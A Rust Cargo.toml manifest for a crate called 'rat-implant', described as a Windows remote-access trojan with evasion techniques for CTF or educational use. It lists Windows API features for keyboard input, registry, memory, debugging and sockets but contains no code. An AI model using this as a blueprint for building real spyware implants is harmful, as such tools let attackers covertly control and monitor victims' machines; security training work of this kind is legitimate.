[package]
name = "rat-implant"
version.workspace = true
edition.workspace = true
authors.workspace = true
license.workspace = true
description = "Windows RAT implant with evasion techniques (CTF/educational)"

[dependencies]
rat-common = { workspace = true }
rand = { workspace = true }

# Windows-only dependencies
[target.'cfg(target_os = "windows")'.dependencies]
windows-sys = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_System_LibraryLoader",
    "Win32_System_Threading",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_SystemInformation",
    "Win32_System_Memory",
    "Win32_System_Registry",
    "Win32_UI_WindowsAndMessaging",
    "Win32_UI_Input_KeyboardAndMouse",
    "Win32_Networking_WinSock",
    "Win32_Security",
    "Win32_System_Console",
    "Win32_Globalization",
]}
